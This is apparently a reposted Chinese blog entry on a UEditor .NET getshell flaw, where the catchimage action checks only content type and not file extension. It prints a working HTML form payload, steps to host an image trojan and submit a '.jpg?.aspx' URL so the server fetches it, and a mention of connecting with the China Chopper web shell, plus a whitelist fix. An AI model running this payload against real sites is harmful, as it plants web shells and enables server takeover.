ue编辑器php漏洞:ueditor getshell
生活随笔
收集整理的這篇文章主要介紹了
ue编辑器php漏洞:ueditor getshell
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
ueditor getshell漏洞概述
8月21日,網上爆出ueditor .net版本getshell漏洞,由于只校驗ContentType而沒校驗文件后綴導致getshell。
ueditor getshell漏洞重現
Payload:
<form action=”http://www.xxx.com/controller.ashx?action=catchimage” enctype=”application/x-www-form-urlencoded” method=”POST”>
<p>shell addr:<input type=”text” name=”source[]” /></p >
<input type=”submit” value=”Submit” />
</form>
圖片馬x.jpg放在自己服務器上
提交http://www.domain.top/x.jpg?.aspx
菜刀連接:
ueditor getshell修復方案
增加文件擴展名校驗(白名單)
ueditor getshell漏洞分析
總結
以上是生活随笔為你收集整理的ue编辑器php漏洞:ueditor getshell的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: cs439辅导 进程和线程以及死锁
- 下一篇: 非管理型宽温防雷4口百兆光纤收发器工业导